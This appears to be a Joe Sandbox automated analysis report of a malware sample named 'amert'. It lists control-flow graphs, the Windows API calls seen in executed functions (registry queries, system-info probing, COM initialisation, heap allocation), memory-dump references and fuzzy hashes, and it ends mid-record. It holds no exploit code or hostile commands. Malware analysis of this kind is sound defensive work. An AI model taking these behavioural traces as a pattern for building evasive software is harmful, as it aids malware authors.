3629f0 7 API calls 12546->12547 12547->12543 12549 37c52c 12548->12549 12550 37c51c TpCallbackUnloadDllOnCompletion 12548->12550 12549->12535 12550->12549 12553 37b084 Concurrency::details::_Reschedule_chore 12552->12553 12554 37b0de 12553->12554 12555 37c00c GetSystemTimePreciseAsFileTime 12553->12555 12554->12539 12556 37b099 12555->12556 12557 3629f0 7 API calls 12556->12557 12558 37b09f __Mtx_unlock 12557->12558 12559 3629f0 7 API calls 12558->12559 12560 37b0bc __Cnd_broadcast 12559->12560 12560->12554 12561 3629f0 7 API calls 12560->12561 12561->12554 12563 3629fc 12562->12563 12564 3629fa 12562->12564 12565 37bbca 7 API calls 12563->12565 12564->12546 12566 362a02 ___std_exception_copy 12565->12566 12566->12546

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 00395E8B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 550 395e8b-395e98 call 399b02 553 395eba-395ecc call 395ecd ExitProcess 550->553 554 395e9a-395ea8 GetPEB 550->554 554->553 556 395eaa-395eb9 554->556 556->553
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32(00000000,?,00395E8A,?,?,00000000,?), ref: 00395EC7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                                                        • Opcode ID: 42a8de1e29e87ba29efcf3e187c84ad4d702fad603abb68486fb5eacfbbeb98d
                                                                                                                                                                                                                                        • Instruction ID: 34dd0e55c916d3d2e71873f65e7609b4ebd213d066f08c8fe4abf08691c682c5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42a8de1e29e87ba29efcf3e187c84ad4d702fad603abb68486fb5eacfbbeb98d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FE08C30802648AFCE27BB15D915A8E3B1AEF11346F114805FC084A222CF7AFE82CA80
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 003652E0 Relevance: 4.6, APIs: 3, Instructions: 134registryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00000001,?), ref: 0036535D
                                                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,?), ref: 0036538B
                                                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 00365397
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3677997916-0
                                                                                                                                                                                                                                        • Opcode ID: 3863a3c6d7be9beb69b2804c1158b6f9c5c2f039ac13be15bfbe58a0024d5356
                                                                                                                                                                                                                                        • Instruction ID: 230fef93c7b9d59d65eebc6f95785d4a86234f49c20bc3d2654679cd3184443a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3863a3c6d7be9beb69b2804c1158b6f9c5c2f039ac13be15bfbe58a0024d5356
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB41E4B16101089FEB25CF14CC41BEE77B9EB45704F1086ADF919972C1DB75AAC48BA4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00366B70 Relevance: 2.1, APIs: 1, Instructions: 551COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 107 366b70-366bf2 call 393a50 111 3670da-3670f7 call 37c951 107->111 112 366bf8-366c20 call 377360 call 365190 107->112 119 366c24-366c46 call 377360 call 365190 112->119 120 366c22 112->120 125 366c4a-366c63 119->125 126 366c48 119->126 120->119 129 366c94-366cbf 125->129 130 366c65-366c74 125->130 126->125 131 366cf0-366d11 129->131 132 366cc1-366cd0 129->132 133 366c76-366c84 130->133 134 366c8a-366c91 call 37cfc8 130->134 139 366d17-366d1c 131->139 140 366d13-366d15 GetNativeSystemInfo 131->140 137 366ce6-366ced call 37cfc8 132->137 138 366cd2-366ce0 132->138 133->134 135 3670f8 call 396597 133->135 134->129 145 3670fd-367191 call 396597 call 393a50 135->145 137->131 138->135 138->137 144 366d1d-366d26 139->144 140->144 148 366d44-366d47 144->148 149 366d28-366d2f 144->149 182 367193-367198 145->182 183 36719d-3671c5 call 377360 call 365190 145->183 152 366d4d-366d56 148->152 153 36707b-36707e 148->153 150 3670d5 149->150 151 366d35-366d3f 149->151 150->111 155 3670d0 151->155 156 366d58-366d64 152->156 157 366d69-366d6c 152->157 153->150 158 367080-367089 153->158 155->150 156->155 160 366d72-366d79 157->160 161 367058-36705a 157->161 162 3670b0-3670b3 158->162 163 36708b-36708f 158->163 167 366e54-367041 call 377360 call 365190 call 377360 call 365190 call 3652e0 call 377360 call 365190 call 364cb0 call 377360 call 365190 call 377360 call 365190 call 3652e0 call 377360 call 365190 call 364cb0 call 377360 call 365190 call 377360 call 365190 call 3652e0 call 377360 call 365190 call 364cb0 160->167 168 366d7f-366dd6 call 377360 call 365190 call 377360 call 365190 call 3652e0 160->168 165 36705c-367066 161->165 166 367068-36706b 161->166 172 3670b5-3670bf 162->172 173 3670c1-3670cd 162->173 169 3670a4-3670ae 163->169 170 367091-367096 163->170 165->155 166->150 174 36706d-367079 166->174 227 367047-367050 167->227 207 366ddb-366de2 168->207 169->150 170->169 176 367098-3670a2 170->176 172->150 173->155 174->155 176->150 187 3672df-3672fb call 37c951 182->187 200 3671c7 183->200 201 3671c9-3671eb call 377360 call 365190 183->201 200->201 218 3671ef-367208 201->218 219 3671ed 201->219 210 366de6-366e06 call 3983bb 207->210 211 366de4 207->211 221 366e3d-366e3f 210->221 222 366e08-366e17 210->222 211->210 236 36720a-367219 218->236 237 367239-367264 218->237 219->218 221->227 228 366e45-366e4f 221->228 224 366e2d-366e3a call 37cfc8 222->224 225 366e19-366e27 222->225 224->221 225->145 225->224 227->153 232 367052 227->232 228->227 232->161 241 36722f-367236 call 37cfc8 236->241 242 36721b-367229 236->242 239 367266-367275 237->239 240 367291-3672b2 237->240 245 367287-36728e call 37cfc8 239->245 246 367277-367285 239->246 247 3672b4-3672b6 240->247 248 3672b8-3672bd 240->248 241->237 242->241 249 3672fc-367301 call 396597 242->249 245->240 246->245 246->249 261 3672be-3672c5 247->261 248->261 261->187 263 3672c7-3672cf 261->263 264 3672d1-3672d6 263->264 265 3672d8-3672db 263->265 264->187 265->187 267 3672dd 265->267 267->187
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00366D13
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoNativeSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1721193555-0
                                                                                                                                                                                                                                        • Opcode ID: da97ba8c73a15d4beec473ac58151c988ff3c7042382b6b616481361df08b7b2
                                                                                                                                                                                                                                        • Instruction ID: 5c7bf30ab9d179878767eaf03c9c0463d269ee882a063a16d0ef07c39315dab3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da97ba8c73a15d4beec473ac58151c988ff3c7042382b6b616481361df08b7b2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72122970E042049BDF26EB28CD467AD7775EB42314F94829CE819AB3C6DB355E808BD2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00369C90 Relevance: 1.8, APIs: 1, Instructions: 560COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 291 369c90-369cdc 422 369cdd call 4fc0398 291->422 423 369cdd call 4fc0479 291->423 424 369cdd call 4fc0319 291->424 425 369cdd call 4fc02ba 291->425 426 369cdd call 4fc035a 291->426 427 369cdd call 4fc0336 291->427 428 369cdd call 4fc02f7 291->428 429 369cdd call 4fc03d7 291->429 430 369cdd call 4fc0411 291->430 431 369cdd call 4fc036c 291->431 432 369cdd call 4fc046e 291->432 433 369cdd call 4fc042e 291->433 434 369cdd call 4fc0384 291->434 435 369cdd call 4fc04a2 291->435 436 369cdd call 4fc02e2 291->436 437 369cdd call 4fc03c2 291->437 438 369cdd call 4fc0443 291->438 439 369cdd call 4fc02a3 291->439 292 369ce2-369d00 293 369d07-369d0c 292->293 293->293 294 369d0e-369ebf call 377a20 call 377e70 * 2 call 377360 call 377e70 * 3 CoInitialize 293->294 309 369ec1-369ede 294->309 310 369eea 294->310 319 369ee4 309->319 320 36a270-36a290 309->320 311 369eec-369ef5 310->311 312 369ef7-369f0c 311->312 313 369f2c-369f52 311->313 315 369f22-369f29 call 37cfc8 312->315 316 369f0e-369f1c 312->316 317 369f54-369f69 313->317 318 369f89-369faf 313->318 315->313 316->315 321 36a4d2-36a4d7 call 396597 316->321 323 369f7f-369f86 call 37cfc8 317->323 324 369f6b-369f79 317->324 325 369fe6-36a00c 318->325 326 369fb1-369fc6 318->326 319->310 337 36a296-36a29b 320->337 338 36a33b-36a49a call 393a50 320->338 323->318 324->321 324->323 330 36a00e-36a01d 325->330 331 36a03d-36a061 325->331 327 369fdc-369fe3 call 37cfc8 326->327 328 369fc8-369fd6 326->328 327->325 328->321 328->327 339 36a033-36a03a call 37cfc8 330->339 340 36a01f-36a02d 330->340 341 36a063-36a078 331->341 342 36a098-36a0be 331->342 337->310 347 36a2a1-36a2b0 337->347 421 36a4a0-36a4a5 338->421 339->331 340->321 340->339 349 36a08e-36a095 call 37cfc8 341->349 350 36a07a-36a088 341->350 344 36a0f5-36a11b 342->344 345 36a0c0-36a0d5 342->345 353 36a14c-36a16d 344->353 354 36a11d-36a12c 344->354 351 36a0d7-36a0e5 345->351 352 36a0eb-36a0f2 call 37cfc8 345->352 368 36a2b2-36a2c4 347->368 369 36a2c9-36a329 call 377360 * 4 call 369c90 347->369 349->342 350->321 350->349 351->321 351->352 352->344 362 36a16f-36a17b 353->362 363 36a19b-36a1b3 353->363 359 36a142-36a149 call 37cfc8 354->359 360 36a12e-36a13c 354->360 359->353 360->321 360->359 371 36a191-36a198 call 37cfc8 362->371 372 36a17d-36a18b 362->372 365 36a1b5-36a1c1 363->365 366 36a1e1-36a1f9 363->366 375 36a1d7-36a1de call 37cfc8 365->375 376 36a1c3-36a1d1 365->376 377 36a227-36a23f 366->377 378 36a1fb-36a207 366->378 368->310 414 36a32e-36a336 369->414 371->363 372->321 372->371 375->366 376->321 376->375 387 36a4b4-36a4d1 call 37c951 377->387 388 36a245-36a251 377->388 384 36a21d-36a224 call 37cfc8 378->384 385 36a209-36a217 378->385 384->377 385->321 385->384 389 36a257-36a265 388->389 390 36a4aa-36a4b1 call 37cfc8 388->390 389->321 395 36a26b 389->395 390->387 395->390 414->311 421->311 422->292 423->292 424->292 425->292 426->292 427->292 428->292 429->292 430->292 431->292 432->292 433->292 434->292 435->292 436->292 437->292 438->292 439->292
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00369EB8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                                                        • Opcode ID: c1cb2d0674b4ba37f4c5656c97cce0e411b6f22f5a1c0ad3f9b9f27932c49acf
                                                                                                                                                                                                                                        • Instruction ID: 5704a25f1fb792b62a39a38033f848a4a488ddf90d348b806eb117b9bcd273bd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1cb2d0674b4ba37f4c5656c97cce0e411b6f22f5a1c0ad3f9b9f27932c49acf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2732BD71A102189FDB29CF28CC89BDDB7B5EF49304F1085D8E409AB295DB75AE84CF91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0039CDF5 Relevance: 1.7, APIs: 1, Instructions: 198COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 440 39cdf5-39ce16 call 37d8f0 443 39ce18 440->443 444 39ce30-39ce33 440->444 445 39ce4f-39ce5b call 39a81a 443->445 447 39ce1a-39ce20 443->447 444->445 446 39ce35-39ce38 444->446 460 39ce5d-39ce60 445->460 461 39ce65-39ce71 call 39cd7f 445->461 448 39ce3a-39ce3d 446->448 449 39ce44-39ce4d call 39cd3d 446->449 447->449 451 39ce22-39ce26 447->451 452 39ce3f-39ce42 448->452 453 39ce73-39ce83 call 396e40 call 396587 448->453 463 39ce8d-39ce96 449->463 451->445 456 39ce28-39ce2c 451->456 452->449 452->453 453->460 456->453 458 39ce2e 456->458 458->449 464 39cfcc-39cfdb 460->464 461->453 474 39ce85-39ce8a 461->474 467 39ce98-39cea0 call 3985c5 463->467 468 39cea3-39ceb4 463->468 467->468 472 39ceca 468->472 473 39ceb6-39cec8 468->473 476 39cecc-39cedd 472->476 473->476 474->463 477 39cf4b-39cf5b call 39cf88 476->477 478 39cedf-39cee1 476->478 492 39cfca 477->492 493 39cf5d-39cf5f 477->493 480 39cfdc-39cfde 478->480 481 39cee7-39cee9 478->481 482 39cfe8-39cffb call 395f4d 480->482 483 39cfe0-39cfe7 call 39860d 480->483 485 39ceeb-39ceee 481->485 486 39cef5-39cf01 481->486 508 39d009-39d00f 482->508 509 39cffd-39d007 482->509 483->482 485->486 487 39cef0-39cef3 485->487 488 39cf41-39cf49 486->488 489 39cf03-39cf18 call 39cdec * 2 486->489 487->486 496 39cf1b-39cf1d 487->496 488->477 489->496 492->464 494 39cf9a-39cfa3 493->494 495 39cf61-39cf77 call 39a6c3 493->495 519 39cfa6-39cfa9 494->519 495->519 496->488 502 39cf1f-39cf2f 496->502 507 39cf31-39cf36 502->507 507->477 511 39cf38-39cf3f 507->511 513 39d028-39d039 RtlAllocateHeap 508->513 514 39d011-39d012 508->514 509->508 512 39d03d-39d048 call 396e40 509->512 511->507 520 39d04a-39d04c 512->520 515 39d03b 513->515 516 39d014-39d01b call 3995bb 513->516 514->513 515->520 516->512 530 39d01d-39d026 call 398633 516->530 523 39cfab-39cfae 519->523 524 39cfb5-39cfbd 519->524 523->524 527 39cfb0-39cfb3 523->527 524->492 528 39cfbf-39cfc7 call 39a6c3 524->528 527->492 527->524 528->492 530->512 530->513
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 899ce21225c1fd5fa37c78ba4751b5cb1179cc783b16b1057de3aa769f4be9e9
                                                                                                                                                                                                                                        • Instruction ID: 70a37937472506c5a8bdf2c4fc7b2c34dc44876db7a537fe9526f5db57618dbe
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 899ce21225c1fd5fa37c78ba4751b5cb1179cc783b16b1057de3aa769f4be9e9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55610232D206148FDF27AFACC8857EDBBB5BF55311F265119E416AB291D7309D00CBA1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0039CFF0 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 534 39cff0-39cffb 535 39d009-39d00f 534->535 536 39cffd-39d007 534->536 538 39d028-39d039 RtlAllocateHeap 535->538 539 39d011-39d012 535->539 536->535 537 39d03d-39d048 call 396e40 536->537 543 39d04a-39d04c 537->543 540 39d03b 538->540 541 39d014-39d01b call 3995bb 538->541 539->538 540->543 541->537 547 39d01d-39d026 call 398633 541->547 547->537 547->538
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0039A77F,?,?,00396277,?,00000000,?,?,00396EAB,?,00000000), ref: 0039D032
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2835246894.0000000000360000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2839016933.00000000003C1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840464750.00000000003C6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.00000000003C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000633000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.000000000065E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000665000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2840617908.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2843409544.0000000000675000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844289353.0000000000813000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000E.00000002.2844344385.0000000000815000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: 8eb933521ca3ddb23a75e5842e08857202aec62b33d2e494e7ca1dde9526caad
